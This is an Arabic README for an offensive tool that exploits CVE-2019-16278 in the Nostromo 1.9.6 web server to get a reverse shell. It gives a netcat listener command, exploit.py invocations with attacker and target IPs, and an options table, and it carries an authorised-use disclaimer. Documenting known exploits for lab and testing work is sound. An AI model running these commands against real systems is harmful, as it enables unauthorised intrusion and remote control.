
يحتوي هذا المستودع على استغلال لثغرة CVE-2019-16278 في خادم الويب Nostromo 1.9.6، مما يسمح بتنفيذ التعليمات البرمجية عن بعد عبر ثغرة اجتياز الدليل. يستخدم البرنامج النصي pwntools لإنشاء شل عكسي. للاستخدام التعليمي والاختبار المصرح به فقط.
يحتوي هذا المستودع على استغلال (Exploit) للثغرة CVE-2019-16278 في خادم الويب Nostromo 1.9.6، مما يسمح بتنفيذ تعليمات برمجية عن بُعد عبر ثغرة تجاوز المسار (Directory Traversal). يستخدم السكريبت مكتبة pwntools لإنشاء شيل عكسي (Reverse Shell). لأغراض تعليمية واختبارات مصرّح بها فقط.
لتثبيت pwntools، استخدم:
pip3 install pwntools
بدء مستمع (Listener): على جهاز المهاجم، ابدأ مستمعًا على المنفذ المحدد لاستقبال الشيل العكسي:
nc -lvnp <منفذ-المهاجم>
تشغيل السكريبت: استخدم الأمر التالي لتنفيذ سكريبت الاستغلال. استبدل القيم حسب الحاجة.
python3 exploit.py --attacker-ip <ip-المهاجم> --attacker-port <منفذ-المهاجم> [-t ip-الهدف] [-p منفذ-الهدف]
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
في هذا المثال:
--attacker-ip 10.10.14.15 هو عنوان IP لجهاز المهاجم.--attacker-port 4444 هو المنفذ الذي يستمع عليه جهاز المهاجم لاستقبال الشيل العكسي.-t 10.10.10.165 يحدد عنوان IP الهدف (الافتراضي هو 10.10.10.165).-p 80 يحدد منفذ الهدف (الافتراضي هو 80).nc).في حالة النجاح، يجب أن تستقبل شيلًا عكسيًا على المستمع الخاص بك مع إمكانية الوصول إلى النظام الهدف.
هذا السكريبت مخصص للأغراض التعليمية والاختبارات المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. المخترع والمساهمون ليسوا مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن لاختبارها.
| الخيار | الوصف | الافتراضي |
|---|
-t, --target | عنوان IP للمضيف البعيد | 10.10.10.165 |
-p, --port | المنفذ على المضيف البعيد المستهدف | 80 |
--attacker-ip | عنوان IP لجهاز المهاجم للشيل العكسي | لا شيء (مطلوب) |
--attacker-port | منفذ على جهاز المهاجم للشيل العكسي | لا شيء (مطلوب) |